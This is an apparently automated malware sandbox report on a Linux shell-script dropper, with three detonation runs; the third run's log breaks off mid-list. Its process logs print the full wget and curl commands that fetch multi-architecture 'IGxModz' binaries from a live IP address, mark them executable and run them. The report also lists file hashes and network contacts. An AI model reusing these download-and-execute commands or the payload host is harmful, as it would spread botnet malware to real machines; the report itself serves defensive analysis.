Malware Analysis Report

2025-04-03 19:11

Sample ID 241121-krz75s1ekq
Target f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh
SHA256 f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1
Tags
defense_evasion discovery antivm
score
7/10

Analysis Overview

score
7/10

SHA256

f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1

Threat Level: Shows suspicious behavior

The file f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh was found to show suspicious behavior.

Malicious Activity Summary

defense_evasion discovery antivm

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

System Network Configuration Discovery

Writes file to tmp directory

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-21 08:50

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-21 08:50

Reported

2024-11-21 08:54

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

2s

Max time network

131s

Command Line

[/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/cat N/A
N/A N/A /tmp/3AvA N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/IGxModz.mpsl /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.arm6 /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.arm7 /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.ppc /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.m68k /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.x86 /usr/bin/curl N/A
File opened for modification /tmp/3AvA /tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh N/A
File opened for modification /tmp/IGxModz.mips /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.arm4 /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.arm5 /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.sh4 /usr/bin/curl N/A

Processes

/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh

[/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.x86]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.x86]

/bin/cat

[cat IGxModz.x86]

/bin/chmod

[chmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H1]

/tmp/3AvA

[./3AvA x86]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.mips]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.mips]

/bin/cat

[cat IGxModz.mips]

/bin/chmod

[chmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.mips IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H1]

/tmp/3AvA

[./3AvA mips]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.mpsl]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.mpsl]

/bin/cat

[cat IGxModz.mpsl]

/bin/chmod

[chmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.mips IGxModz.mpsl IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H1]

/tmp/3AvA

[./3AvA mpsl]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.arm4]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.arm4]

/bin/cat

[cat IGxModz.arm4]

/bin/chmod

[chmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.mips IGxModz.mpsl IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H1]

/tmp/3AvA

[./3AvA arm4]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.arm5]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.arm5]

/bin/cat

[cat IGxModz.arm5]

/bin/chmod

[chmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.mips IGxModz.mpsl IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H1]

/tmp/3AvA

[./3AvA arm5]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.arm6]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.arm6]

/bin/cat

[cat IGxModz.arm6]

/bin/chmod

[chmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.mips IGxModz.mpsl IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H1]

/tmp/3AvA

[./3AvA arm6]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.arm7]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.arm7]

/bin/cat

[cat IGxModz.arm7]

/bin/chmod

[chmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.mips IGxModz.mpsl IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H1]

/tmp/3AvA

[./3AvA arm7]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.ppc]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.ppc]

/bin/cat

[cat IGxModz.ppc]

/bin/chmod

[chmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H1]

/tmp/3AvA

[./3AvA ppc]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.m68k]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.m68k]

/bin/cat

[cat IGxModz.m68k]

/bin/chmod

[chmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.m68k IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H1]

/tmp/3AvA

[./3AvA m68k]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.sh4]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.sh4]

/bin/cat

[cat IGxModz.sh4]

/bin/chmod

[chmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.m68k IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.sh4 IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H1]

/tmp/3AvA

[./3AvA sh4]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
US 151.101.193.91:443 tcp
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.193.91:443 tcp
GB 89.187.167.6:443 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 89.187.167.38:443 1527653184.rsc.cdn77.org tcp

Files

/tmp/IGxModz.x86

MD5 960b4fa9d5383373f0a1ea04929df01b
SHA1 f78054d817db7742162a706b5d9f1fedcdf21140
SHA256 3e3036a7715bae7bda5c0b2de74731a835b869ded4d470cddb7f6521114aca7a
SHA512 2d5c6ad2bb0f8a8b971d759e3618e8636034cee5b76c362c2107b7fadc38bcaabbaa79cd19f5f2e949005e3d128b1a4efff187d1a3f035791dcbd1255b7ed73f

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-21 08:50

Reported

2024-11-21 08:54

Platform

debian9-armhf-20240729-en

Max time kernel

8s

Max time network

9s

Command Line

[/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/cat N/A
N/A N/A /tmp/3AvA N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/3AvA /tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh N/A
File opened for modification /tmp/IGxModz.mpsl /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.arm4 /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.arm7 /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.ppc /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.sh4 /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.x86 /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.mips /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.arm5 /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.arm6 /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.m68k /usr/bin/curl N/A

Processes

/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh

[/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.x86]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.x86]

/bin/cat

[cat IGxModz.x86]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE]

/tmp/3AvA

[./3AvA x86]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.mips]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.mips]

/bin/cat

[cat IGxModz.mips]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.mips IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE]

/tmp/3AvA

[./3AvA mips]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.mpsl]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.mpsl]

/bin/cat

[cat IGxModz.mpsl]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE]

/tmp/3AvA

[./3AvA mpsl]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.arm4]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.arm4]

/bin/cat

[cat IGxModz.arm4]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE]

/tmp/3AvA

[./3AvA arm4]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.arm5]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.arm5]

/bin/cat

[cat IGxModz.arm5]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE]

/tmp/3AvA

[./3AvA arm5]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.arm6]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.arm6]

/bin/cat

[cat IGxModz.arm6]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE]

/tmp/3AvA

[./3AvA arm6]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.arm7]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.arm7]

/bin/cat

[cat IGxModz.arm7]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE]

/tmp/3AvA

[./3AvA arm7]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.ppc]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.ppc]

/bin/cat

[cat IGxModz.ppc]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE]

/tmp/3AvA

[./3AvA ppc]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.m68k]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.m68k]

/bin/cat

[cat IGxModz.m68k]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.m68k IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE]

/tmp/3AvA

[./3AvA m68k]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.sh4]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.sh4]

/bin/cat

[cat IGxModz.sh4]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.m68k IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.sh4 IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE]

/tmp/3AvA

[./3AvA sh4]

Network

Country Destination Domain Proto
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp

Files

/tmp/IGxModz.x86

MD5 960b4fa9d5383373f0a1ea04929df01b
SHA1 f78054d817db7742162a706b5d9f1fedcdf21140
SHA256 3e3036a7715bae7bda5c0b2de74731a835b869ded4d470cddb7f6521114aca7a
SHA512 2d5c6ad2bb0f8a8b971d759e3618e8636034cee5b76c362c2107b7fadc38bcaabbaa79cd19f5f2e949005e3d128b1a4efff187d1a3f035791dcbd1255b7ed73f

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-21 08:50

Reported

2024-11-21 08:54

Platform

debian9-mipsbe-20240611-en

Max time kernel

29s

Max time network

31s

Command Line

[/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/cat N/A
N/A N/A /tmp/3AvA N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/IGxModz.mips /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.mpsl /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.arm4 /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.arm5 /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.arm7 /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.ppc /usr/bin/curl N/A
File opened for modification /tmp/3AvA /tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh N/A
File opened for modification /tmp/IGxModz.arm6 /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.m68k /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.sh4 /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.x86 /usr/bin/curl N/A

Processes

/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh

[/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.x86]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.x86]

/bin/cat

[cat IGxModz.x86]

/bin/chmod

